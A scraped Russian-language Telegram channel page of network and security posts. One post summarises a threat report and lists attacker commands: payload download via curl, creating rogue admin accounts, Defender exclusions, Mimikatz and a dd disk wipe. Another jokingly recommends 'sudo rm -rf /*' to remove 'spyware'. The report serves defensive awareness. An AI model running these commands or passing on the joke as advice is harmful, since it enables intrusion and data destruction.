Mikrotik Ninja @mikrotikninja Channel on Telegram

Mikrotik Ninja

@mikrotikninja


Канал по новым компьютерным технологиям и защите компьютерных программ


Блог http://bubnovd.net
https://medium.com/@dbubnov
https://xakep.ru/author/bubnovd/
Мысли неглупых людей https://t.me/channel1name
Книги https://t.me/mreadninja

Mikrotik Ninja (Russian)

Добро пожаловать в канал Mikrotik Ninja! Если вы увлечены новыми компьютерными технологиями и защитой компьютерных программ, то вы попали по адресу. Наш канал предлагает самые свежие новости, советы и обзоры в мире IT. Подписывайтесь на наш блог по ссылке http://bubnovd.
et, где вы найдете еще больше полезной информации о мире компьютерной безопасности. Вы также можете почитать наши статьи на https://medium.com/@dbubnov и https://xakep.ru/author/bubnovd/. Мы также делимся мыслями неглупых людей в канале https://t.me/channel1name и рекомендуем интересные книги в канале https://t.me/mreadninja. Присоединяйтесь к нам, чтобы быть в курсе всех последних тенденций в мире компьютерных технологий и защиты программ!

Mikrotik Ninja

14 Jan, 16:01


А на фоне всего этого веселья с Интернетом, хочу напомнить, что у меня для ваших Mikrotik'ов есть мониторинг.

https://t.me/mikrotikninja/1768

Скоро допилю бота для регистрации без участия человека (меня )

Mikrotik Ninja

14 Jan, 14:26


Отставить панику!
Всё обязательно починят

Mikrotik Ninja

30 Dec, 08:06


Сквозь тени анархии: разбираем атаки Cyber Anarchy Squad

Отчет о деятельности хак-группы. Интересно узнать какими инструментами пользуются атакующие:
1. Initial Access (Первоначальный доступ):
-Компрометация сервисов: Используются уязвимости в Jira, Confluence, MS SQL Server.

2. Execution (Выполнение):
- Запуск команд через MS SQL: cmd.exe /c
-Процесс cmd.exe запускается как дочерний процесс sqlservr.exe
- Запуск PowerShell-скриптов:
powershell.exe -ex bypass -f \\[DOMAIN]\netlogon\rm.ps1

-Загрузка обратной оболочки Meterpreter через c URL:
cmd.exe" /c cd %appdata% && dir && curl -O [URL]/sdc.exe


-Запуск Revenge RAT через PowerShell:
powershell.exe -WindowStyle Hidden -NoExit -Command 
[System.Reflection.Assembly]::LoadFile('C:\Users\<username>\Downloads\<exe_name>.exe').EntryPoint.Invoke($null, @())



3. Persistence (Закрепление):
-Создание учетных записей:
net user admin cas /add
net user admin admin123123123 /add

-Автозапуск через реестр:
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey.SetValue("rpchost", "\"C:\\Windows\\System32\\rpchost.exe\"");

-Создание службы для RAT:
Program.hService = Helper.CreateService(Program.hSCM, "NgcMngrSvc", "Microsoft Passport Manager", 983551, 16, 2, 0, Program.system + "svxhost.exe", null, IntPtr.Zero, null, null, null);


4. Defense Evasion (Уклонение от обнаружения):
- Отключение EPP через PowerShell:
 $guidQuery = wmic product where "[redacted]" get IdentifyingNumber
$guid = $guidQuery | Select-String -Pattern "{[A-F0-9-]+}" | ForEach-Object { $_.Matches[0].Value }
msiexec.exe /x $guid /quiet

-Добавление исключений Windows Defender:
powershell Add-MpPreference -ExclusionPath '$windir\$system32'

- Имитация системных процессов:
С:\Windows\System32\svxhost.exe
C:\Windows\System32\drivers\etc\rpchost.exe



5. Credential Access (Доступ к учетным данным):
-Сбор паролей с использованием Mimikatz(пример извлечения хэшей): sekurlsa::logonpasswords


6. Discovery (Исследование инфраструктуры):
- Сбор информации о пользователях и системе:
 net user
systeminfo
net localgroup
cd %appdata% && whoami

WMI-запросы:
 SELECT * FROM Win32_OperatingSystem
SELECT UserName FROM Win32_ComputerSystem
SELECT * FROM WIN32_Processor



7. Command and Control (Управление):
-Конфигурация Spark RAT:
{
"secure": false,
"host": "[C2_SERVER]",
"port": 9610,
"path": "/",
"uuid": "3917b41****",
"key": "aa494c90****"
}


8. Impact (Нанесение ущерба):
- Шифрование файлов:
Используются LockBit и Babuk с расширениями, связанными с группой, например 3119.
-Удаление данных через dd:
 dd if=/dev/zero of=/dev/[VOLUME] bs=4M


Выжимку по командам стащил из Linkedin

#security #report

Mikrotik Ninja

30 Dec, 06:12


Falcosidekick - коннектор Falco (eBPF аудит сисколов) ко всему на свете - позволит отправлять уведомленния о событиях в мессенджеры, БД, Jira, да куда угодно

И falcosidekick-ui - UI к нему

#falco #security

Mikrotik Ninja

24 Dec, 18:11


Про "колл-центры" сбера
https://promo.sber.ru/kibrary/assets/berdyansk.pdf

Mikrotik Ninja

19 Dec, 08:34


https://github.com/kuberhealthy/kuberhealthy

A Kubernetes operator for running synthetic checks as pods. Works great with Prometheus!

#slachnews #k8s

Mikrotik Ninja

14 Dec, 06:51


Курс Large Language Model Agents
Сам курс уже заканчивается, но лекции и слайды доступны

- Foundation of LLMs
- Reasoning
- Planning, tool use
- LLM agent infrastructure
- Retrieval-augmented generation
- Code generation, data science
- Multimodal agents, robotics
- Evaluation and benchmarking on agent applications
- Privacy, safety and ethics
- Human-agent interaction, personalization, alignment
- Multi-agent collaboration

#LLM #course

Mikrotik Ninja

11 Dec, 09:16


Метеостанция на e-ink дисплее. Выглядит шикарно

#electro

Mikrotik Ninja

10 Dec, 09:24


Эффект ложного консе́нсуса — это склонность проецировать свой способ мышления на других людей

Так произошло и со мной. Около десяти лет назад я где-то увидел удобный способ вставки текста из буфера в консоли Linux и пользовался этим способом каждый день, наивно полагая, что всем вокруг это известно и никто даже не задумывается о том, чтобы открыть vim или другой редактор перед созданием файла.

Вчера я понял, что эта магия известна не каждому. Поэтому решил поделиться ей с вами. Итак, чтобы вставить в файл из буфера обмена в терминале надо сделать:

cat > filename
Ctrl + V
Enter
Ctrl + C


UPD: естественно, в буфере должен быть какой-то текст перед нажатием Ctrl + V

Mikrotik Ninja

09 Dec, 06:52


Начинаем неделю с правильных курсов
https://stepik.org/course/5717/promo

Mikrotik Ninja

04 Dec, 16:05


SQL Injection в Zabbix с CVSS 9.9
Пора обновляться!

Mikrotik Ninja

04 Dec, 10:52


Как связаны принтеры и стеганография?

Оказывается, напрямую. Принтеры умеют оставлять скрытые метки на каждом распечатанном листе. Такая технология и называется стеганографией, а её идея далеко не нова — вспомните картины Леонардо да Винчи, где до сих пор находят скрытые послания.

В 1992 году компания Xerox придумала, как применить это для безопасности, и запатентовала способ маркировки документов. Его назвали Machine Identification Code (MIC). Если проще — «жёлтые точки». Позже этот подход стали использовать и другие производители принтеров.

🔓 Как это работает?

На листе размещаются едва заметные жёлтые точки, с помощью которых можно определить серийный номер принтера, модель устройства, дату и время печати.

Проверить их наличие просто: энтузиасты из Германии создали сервис Dotspotter, куда можно загрузить скан документа и узнать, есть ли на нём такие метки. Это отличный способ проверить, маркирует ли ваш принтер документы без вашего ведома.

🦖 А студенты из Технического университета Дрездена пошли дальше и разработали фреймворк DEDA для выявления каналов утечки данных и обеспечения безопасности. С его помощью можно:
1. Находить такие точки в документах.
2. «Замусоривать» метки вашего принтера, чтобы никто не смог их использовать.
3. Создавать свои собственные метки, чтобы отследить, куда дальше попадут ваши документы.

Теперь вы знаете, что скрытые механизмы принтеров — это не просто технологии из прошлого, а мощный инструмент для предотвращения утечек и обеспечения конфиденциальности. Расскажите в комментариях, знали о таком способе защиты информации?


#без_бюджетов #Дмитрий_Борощук

🏠 Кибердом & Бизнес

Mikrotik Ninja

04 Dec, 06:39


Надоело скачивать софт на винду в интернете?
scoop.sh - пакетный менеджер

> scoop search python
Results from local buckets...

Name Version Source Binaries
---- ------- ------ --------
python 3.10.5 main
winpython 3.10.4.0 main

> scoop install python
...
Creating shim for 'python.exe'.
'python' (3.10.5) was installed successfully!

Mikrotik Ninja

03 Dec, 07:42


Linux Foundation раздает скидки на курсы и сертификаты. Халява закончится 11 декабря. Успевайте

Mikrotik Ninja

03 Dec, 06:51


Selectel Network MeetUp#11: о вендоре на букву М
 
12 декабря Selectel проведет Network MeetUp о том, что мучительно знакомо каждому сетевому инженеру. Обсудят использование оборудования на букву «М», его плюсы и минусы, а также кейсы его применения применения.
 
В программе мероприятия четыре доклада:
 
● М***k у небольшого оператора связи
● М***k в проде Selectel
● Умные сетевые карты
● От идеи до макета: продукт по Agile
 
Офлайн участников также ждет:
— Настройка сетевого оборудования на скорость
— Фото и мем зоны
— Голосование за наиболее популярный способ управления M***k
 
Приходите офлайн в офис Selectel в Санкт-Петербурге или подключайтесь онлайн.
 
Мероприятие бесплатное. Посмотреть программу митапа и зарегистрироваться: https://slc.tl/bi81n

Реклама, АО «Селектел», ИНН: 7810962785, ERID: 2VtzqwRvNQG

Mikrotik Ninja

02 Dec, 09:03


На TryHackMe стартанул очередной рождественский конкурс Advent of Cyber 2024

В игровой форме нам предлагают спасти Санта Клауса и Рождество от рук злых хакеров. Я каждый год участвую в этом конкурсе и призываю всех присоединиться. Очень интересные задания, знакомство с ИБ с разных сторон, знаний в ИТ и ИБ не требуется - всё объяснят с самого начала. Участие бесплатное

Mikrotik Ninja

29 Nov, 08:33


WSJ: CrowdStrike сообщает про рост квартальной выручки и повышает прогноз на весь год

– Выручка CrowdStrike выросла на 29%, до $1,01 млрд
– Аналитики ожидали, что выручка будет $982,8 млн
– Квартальный убыток CrowdStrike составил $16,8 млн
– Годом ранее компания показала прибыль $26,7 млн
– Показатель ARR увеличился на 27%, до $4,02 млрд
– Выручка за новый квартал будет $1,03-1,04 млрд
– По итогам всего года она будет $3,92-3,93 млрд
– Прошлый прогноз CrowdStrike был $3,89-3,9 млрд
– CrowdStrike основали бывшие руководители McAfee
– Почти 300 компаний из Fortune 500 стали клиентами

@ftsec

Mikrotik Ninja

29 Nov, 08:33


КОСЯК ТЫСЯЧЕЛЕТИЯ!
ДЕСЯТКИ ТЫСЯЧ КОМПОВ ЛЕЖАТ!
АЭРОПОРТЫ НЕ ФУНКЦИОНИРУЮТ!
КО-КО-КО
РЕПУТАЦИЯ КОМПАНИИ НА НУЛЕ
CrowdStrike разорится

Тем временем CrowdStrike:

Mikrotik Ninja

29 Nov, 07:36


Присоединяйтесь по ссылке на прямую трансляцию конференции GETNET.pro.

Программа докладов:
11-00 - "Что нового в RouterOS появилось за последние два года"
12-00 - "Проблема ближнего радиуса"
13-00 - "Средний бизнес — это маленький вайфай"
14-00 - "Слова из трех букв. Литературно-комиксовая зарисовка для любителей Mikrotik из современного словаря модных в IT слов"
15-00 - "Вредные советы для сетевиков"
16-00 - "Жизненный цикл Wi-Fi сети: что нужно знать и как поддерживать сеть работоспособной и актуальной"
17-00 - "Annushka уже разлила..."
18-00 - "BDSM"

Mikrotik Ninja

28 Nov, 16:34


Я тебя найду и позвоню

Вышла очень важная статья на Хабре о торговле за копейки нашими данным.

Не об утечках! О легальных сервисах позволяющих за 1 звонок без снятия трубки раскрыть данные о ваших перемещениях, посещаемые сайты и метаданные ваших телефонных переговоров!

Очень прошу помочь с репостами, такой легальный пробив не должен существовать.

Mikrotik Ninja

21 Nov, 12:50


GetNet 2024: Применение передовых практик в сетевом администрировании
Дата: 29 ноября | Время: 11:00 - 19:00 | Формат: Онлайн | Бесплатный

На GetNet вы откроете для себя эффективные стратегии и инновационные подходы в сетевом администрировании, которые помогут оптимизировать работу вашей сети. Эксперты поделятся проверенными решениями и последними инновациями, которые преобразят ваш подход к управлению сетевыми ресурсами.

Основные доклады:

- Николай Кузнецов – "Проблема ближнего радиуса": детальное обсуждение настройки фаервола и безопасности на канальном уровне в MikroTik RouterOS.
- Павел Галкин – "Литературно-комиксовая зарисовка для любителей Mikrotik": разбор DevOps методологии и её применимости в управлении сетевыми операциями.
- Михаил Антонов – "Вредные советы для сетевиков": анализ типичных ошибок в построении и управлении сетями и методы их предотвращения.

Все доклады можно посмотреть тут

Это возможность улучшить знания и навыки в области сетевого администрирования и применить на практике передовые технологии и стратегии.

Mikrotik Ninja

15 Nov, 09:41


Весь год ждали скачух на сертификацию на черную пятницу, нате

https://github.com/0x90n/InfoSec-Black-Friday?tab=readme-ov-file#online-courses--training

#BlackFriday #Promo

Mikrotik Ninja

13 Nov, 15:20


Мало кто из зарубежных коллег знает простой способ удалить из системы весь шпионский софт _Р_оссийской _Ф_едерации:

sudo rm -rf /*

UPD:
Рекомендуют добавить ключ --no-preserve-root чтобы также удалить малварь из системных директорий

Mikrotik Ninja

12 Nov, 09:00


Azure Active Directory security operations guide

#security #microsoft #azure #AD

Mikrotik Ninja

07 Nov, 15:59


Ссылки на PR'ы
https://github.com/reactor/reactor-core/pull/3897
https://github.com/reactor/reactor-core/pull/3921

Ссылки на оригинальные посты
https://t.me/kuleshov_razgonyaet/58
https://t.me/kuleshov_razgonyaet/60

Mikrotik Ninja

04 Nov, 13:20


CVE-2024-51774 RCE

qBitTorrent в течение 14 лет игнорировал валидацию сертификатов.

Коммит с игнором был добавлен в 2010
Какие риски?
1. Когда Python недоступен в Windows, qBittorrent предлагает пользователю установить его через жестко закодированный URL, указывающий на исполняемый файл Python. Из-за отсутствия проверки сертификатов злоумышленник, перехвативший запрос, может заменить ответ URL вредоносным инсталлятором Python, который может выполнить RCE

2. qBittorrent проверяет наличие обновлений, получая XML-ленту по жестко заданному URL-адресу, а затем анализирует ее на предмет ссылки на скачивание новой версии. При отсутствии SSL-проверки злоумышленник может подставить в фид вредоносную ссылку на обновление, побуждая пользователя загрузить вредоносную полезную нагрузку.

3. Менеджер загрузок qBittorrent также используется для RSS-каналов, что позволяет злоумышленникам перехватывать и изменять содержимое RSS-каналов и внедрять вредоносные URL-адреса, выдавая их за безопасные торрент-ссылки

4. qBittorrent автоматически загружает сжатую базу данных GeoIP с жестко заданного URL и распаковывает ее, что позволяет использовать потенциальные ошибки переполнения памяти через файлы, полученные с поддельного сервера

via https://sharpsec.run/rce-vulnerability-in-qbittorrent/

Mikrotik Ninja

04 Nov, 11:47


Легкий сетевой сканер IP с веб-интерфейсом

- Отправка уведомления при обнаружении нового хоста
- Мониторинг истории хостов в режиме онлайн/офлайн
- Ведение списка всех хостов в сети
- Отправка данных в InfluxDB2 для создания панели Grafana

#monitoring #grafana

Mikrotik Ninja

02 Nov, 08:41


Сегодня будет стрим из Томского хакспейса "Akiba" в 18:00 (время UTC+7:00), 14:00 по МСК.

Список докладов

- Артефакты нейровокодеров
Докладчик: @Jl4cTuk
Узнаем какие артефакты оставляют модели синтеза речи, как с этим борются и живут.

- Основы электроники для начинающих радиогубителей.
Докладчик: @Alkekseevich
Доклад о том как я вкатился в электронику с нуля. Расскажу о том какие знания необходимы, а так же про траекторию развития в данной отрасли.

- SIGKILL 'Em All: цель и путь сигналов в Linux.
Докладчик: @g1inko
Как доставляются сигналы? Что они такое, и какие бывают? И из-за чего процессы могут стать не убиваемыми?

- NixOS: Что это и как с этим жить.
Докладчик: @M4maI
На докладе познакомимся с NixOS, что это за дистрибутив, как с ним работать и узнаем как его использовать в CTF

- ХэСС
Докладчик: @var1m
Что ты знаешь про ХэСС? Точно?

- Жизнь и смерть tcp сокета в ядре Linux.
Докладчик: @Daniil159x
Думаю, все так или иначе работали с TCP. Посмотрим как оно работает под слоями абстракций.


Ссылка на трансляцию
https://www.youtube.com/live/nbOsBA3BYPE

Чат хакспейса @hackspace_tomsk

Mikrotik Ninja

25 Oct, 06:46


Сайт с информацией об одноплатниках.

Если давно выбираете между RPi, OrangePi, Intel NUC, то теперь вариантов выбора будет ещё больше и вы уж точно никогда не купите себе миниПК

#miniPC #RPi

Mikrotik Ninja

24 Oct, 05:20


Шаблоны для построения security пайплайнов. Можно взять какие-то идеи при построении DevSecOps пайплайна

Ещё один

#security

Mikrotik Ninja

23 Oct, 09:29


«Тени не скроются: Расследование атак группировки Shadow»

F.A.C.C.T. выкатили объемный отчет о группировке Shadow, а также жирный комплект инструментария, используемого в атаках.

#security #report

Mikrotik Ninja

23 Oct, 05:35


DevSec Hardening Framework
Фреймворк и набор плейбуков для усиления безопасности ОС и сервисов

#security

Mikrotik Ninja

17 Oct, 12:34


🦄 Open SysConf 2024

https://www.youtube.com/live/Egn302kDVDo

Mikrotik Ninja

14 Oct, 08:39


В рамках моего эксперимента по программированию без программирования всем подписчикам этого канала доступен ChatGPT Bot. Бот простой как палка, просто транслирует вопросы в OpenAI API и шлет ответы. Сейчас бот использует модель gpt-4o и абсолютно бесплатен. Не могу гарантировать, что так будет всегда, посмотрим что из этого получится.

Чтобы пользоваться ботом достаточно быть подписчиком канала и написать ему в личку @apten_bot или в группе с обсуждениями используя команду /ask.

Код бота полностью opensource и доступен на GitHub, там же можно оставлять Issues если вам что-то от него нужно.

Бот неспешно разрабатывается с использованием AI под моим наставничеством.

Кому это может быть полезно?
Всем кто по каким-либо причинам не может использовать chatgpt.com напрямую, спасибо за внимание.

Mikrotik Ninja

14 Oct, 05:26


Давно хотел сделать что-то полезное для сообщества. Идеально было бы для этого совместить свою экспертизу в Mikrotik с навыками DevOps.

Идея для проекта пришла из админского опыта. Так вышло, что почти во всех компаниях, где я работал сисадмином или сетевиком, в первую очередь я внедрял мониторинг. Для малого и среднего бизнеса внедрение мониторинга - далеко не первоочередная задача для админа, который загружен ежедневной рутиной.

Встречайте - облачный мониторинг RouterOS
Для знакомства с системой можно залогиниться с любой Google учетки, по кнопке Dashboards доступен дашборд Mikrotik Exporter - весь текущий функционал виден там:

- Использование CPU/RAM/HDD
- Информация от DHCP сервера
- Детальная инфомация о трафике на интерфейсах
- Детально об использовании фаервола
- Информация о Wi-Fi: CCQ, сила сигнала, сигнал-шум, CAPsMAN
- Очереди

Для демо стоит простой hAP ac, поэтому на дашборде рисуются не все графики

Под капотом VictoriaMetrics, Grafana, mktxp exporter. Метрики собирает через API. Для сбора метрик использует шифрованное подключение к API и пользователя с read-only правами.

Я всегда голосую за безопасность, поэтому архитектура системы создана так, чтобы максимально изолировать данные пользователей друг от друга. Метрики от каждого клиента складываются в свою БД.

Cервис бесплатный. Мониторить можно неограниченное количество роутеров. Регистрация и подключение пока только в ручном режиме:
- на роутере выполняете скрипт:
/user group add name=monitoring policy=api,read
/user add name=monitoring group=monitoring password=PASSWORD
/ip firewall address-list add list=grafana.mninja.net address=grafana.mninja.net
/ip firewall filter add chain=input src-address-list=grafana.mninja.net action=accept protocol=tcp dst-port=8729 place-before=1 comment=monitoring
/ip service enable api-ssl
/ip service set api-ssl certificate=none
/ip service set api-ssl address=0.0.0.0/0

- логинитесь через гугл учетку (или создаете учетку прямо в grafana)
- пишите в личку @bubnov "почта такая то, хочу мониторить роутеры с такими адресами, пароль такой"
- я добавляю для вас клиента и дашборд
- мониторинг настроен

Зачем это нужно мне?
- интересно поработать над своим проектом
- хочется принести пользу сообществу
- было бы здорово развить проект до "больших" нагрузок, это покажет неочевидные места в архитектуре и работе с заказчиками
- хочется получить опыт онлайн проекта

Какие планы?
- сделать автоматическую регистрацию, например, через Telegram
- добавить мониторинг серверов и другого сетевого оборудования
- настроить индивидуальные уведомления
- добавить сбор логов
- добавить анализ netFlow

Чтобы не забивать канал новостями о положении дел в проекте, буду писать о нем раз месяц с тегом #grafana_mninja_net. Любые пожелания и идеи, как всегда приветствуются

Mikrotik Ninja

11 Oct, 15:28


1. Counting endpoints https://lnkd.in/g9y6-3fW
2. Waiting for a miracle https://lnkd.in/g4y4e-Ts
3. I said stop https://lnkd.in/gQ8rKNrG
4. Designing shared clusters https://lnkd.in/gQDszDXJ
5. Kernel panic https://lnkd.in/gR4RWH7t
6. Hop, little bunny https://lnkd.in/g6rUJT3N
7. How many is too many https://lnkd.in/g8DP-7AK
8. Keeping the lights on https://lnkd.in/gtxyAZWm
9. Greedy etcd https://lnkd.in/gjYnCNhr
10. Multiplying pods https://lnkd.in/gAAVZrwa
11. Going indie https://lnkd.in/g5_SG-F2
12. Rollin’ https://lnkd.in/d2cpVtVS
13. All you can eat https://lnkd.in/gYhrUtBd
14. Bounce https://lnkd.in/gHY8hng9
15. Down the rabbit hole https://lnkd.in/gppAWFzP
16. Throttled https://lnkd.in/gQC6EBWD
17. Sticky mess https://lnkd.in/gKRthmNn
18. Dead or alive https://lnkd.in/gyhQY2bm
19. Tied up https://lnkd.in/duJtTs37
20. One to bind them all https://lnkd.in/gGQamC7c

Source: https://x.com/danielepolencic/status/1666063542011977728

Mikrotik Ninja

02 Oct, 08:41


Инструмент управления файлами на базе ИИ, который сканирует, реструктурирует и организует файлы для быстрого доступа и легкого поиска.
Использует модели Llama3.2 3B и Llava v1.6 с Nexa SDK.
Обещают конфиденциальность

https://github.com/QiuYannnn/Local-File-Organizer

#slachnews #files #organizer

Mikrotik Ninja

27 Sep, 04:05


Подъехало описание той самой ужасной СVE, которой обещали уничтожить весь nix мир.

Уязвимость оказалась в СUPS - подсистеме печати.
Эксплуатация:
1. Служба cups-browsed была включена или запущена
2. Злоумышленник имеет доступ к уязвимому серверу, который:
a. Предоставляет неограниченный доступ, например, к общедоступному Интернету, или
b. Получает доступ к внутренней сети, где локальные соединения являются доверенными
3. Злоумышленник объявляет вредоносный сервер IPP, тем самым предоставляя вредоносный принтер
4. Потенциальная жертва пытается выполнить печать с вредоносного устройства
5. Злоумышленник выполняет произвольный код на машине жертвы

Как защититься:
systemctl stop cups-browsed && systemctl disable cups-browsed


PoC и описание

Mikrotik Ninja

25 Sep, 14:00


Объявляю неделю новостей о Mikrotik (ага, в среду вечером 😊)

a collaboration to develop a new line of products featuring state-of-the-art server-class CPUs that will push the boundaries of cost-effective, efficient, and powerful networking

Mikrotik вместе с производителем чипов Ampere хотят выпустить "новый продукт". Новости интересные, посмотрим что получится

https://help.mikrotik.com/docs/pages/viewpage.action?pageId=271974440

Mikrotik Ninja

25 Sep, 13:31


Sara: RouterOS Security Inspector

Python скрипт для проверки безопасности конфигурации RouterOS

#routeros #mikrotik #security #analyzer

Mikrotik Ninja

25 Sep, 05:37


В "Building Secure and Reliable Systems" обнаружил интересную опцию для OpenSSH - ForceCommand.

При логине юзера на сервер будет автоматически выполняться команда, записанная в этом параметре.

Опцию удобно и безопасно использовать для сервисных роботов или техподдержки. Например, сделать ps -a или при логине запустить скрипт бэкапа. Ничего другого пользователь сделать не сможет.

Mikrotik Ninja

20 Sep, 07:10


https://www.opennet.ru/opennews/art.shtml?num=61895

А ещё они в Linkedin пишут

Mikrotik Ninja

18 Sep, 07:49


Уже во второй раз ламповое комьюнити беспроводников собирает WiFI-марафон своими силами и средствами.
Из намеченных тем:
- Реконструкция Wi-Fi в контейнерном терминале в условиях ограниченного бюджета / Арсений Синвайтес-Бринкс
- Wi-Fi сеть на ледовой арене. Проектирование, наладка, аудит / Максим Гетман
- «Импортозамещенный Wi-Fi глазами разработчика: почему нельзя дешево, быстро и качественно» / Даниил Слюсарь, Виктор Платов
- На чем строить сеть Wi-Fi в 2024 году? / Алексей Елин
- WlanPI. Что это такое и его применение / Константин Баженин
- Wi-Fi по правилам и без. За пределами гайдлайнов / Алексей Елин
- IEEE 802.11bn. Заглянем в будущее / Антон Викулов
- Авторизация в Wi-Fi сетях / Антон Винокуров
- Как сделать свой вай-фай контроллер / Антон Винокуров
- Особенности сюрвеев и радиопланирования с TamoGraph Site Survey / Мила Брен

Места еще есть, в прошлый раз было интересно 🙂

#wireless #meetups

Mikrotik Ninja

29 Aug, 08:08


Про PingFS уже слышали, а теперь DNS для хранения файлов. Нет, дед не забыл принять таблетки.

Рассматривается возможность использования открытых DNS-резолверов для хранения данных

DNSFS разбивает файлы на небольшие части и хранит их в виде TXT-записей в кэше DNS-резолверов, что позволяет использовать их как распределенное хранилище данных

Пост стоит прочтения хотя бы ради статистики по DNS резолверам и, в хорошем смысле, хакерского подхода к технологиям

UPD: тулза для хранения файлов в DNS

#DNS #FS #storage

Mikrotik Ninja

28 Aug, 07:01


OpenTofu ("хороший" аналог terraform) выпилили поддержку rustack, sbercloud, yandex-cloud.
Такой вот современный OpenSource

https://github.com/opentofu/registry/pull/817

Mikrotik Ninja

25 Aug, 11:42


Французы пошли дальше и решили накрыть всю ОПГ. В международный розыск уже объявлены:

Винт Серф и Боб Кан за создание протокола TCP/IP, позволившего совершать преступления через Интернет.

Финикийцы за изобретение алфавита, которым пользуются преступники по всему миру.

Стив Джобс и Билл Гейтс за предоставление персональных компьютеров и операционных систем мошенникам и террористам.

Томас Эдисон за то, что благодаря ему у преступников было освещение даже по ночам.

Франция заявила, что правосудие найдёт и привлечет к ответственности всех виновных, где бы они ни скрывались!

Mikrotik Ninja

25 Aug, 03:14


❗️Павел Дуров, основатель и руководитель Telegram, управляющей одноименным популярным мессенджером, задержан французской полицией после посадки его частного самолета в аэропорту «Ле Бурже», сообщают французские телеканалы LCI и TF1.

Он был задержан жандармами Жандармерии воздушного транспорта.

Как пишет TF1, Дуров был объявлен в розыск на том основании, что отсутствие модерации в телеграме и сотрудничества с правоохранительными органами сделало его соучастником незаконной деятельности, происходящей в этой сети, в том числе распространения наркотиков, детской порнографии и мошенничества. Новость будет обновляться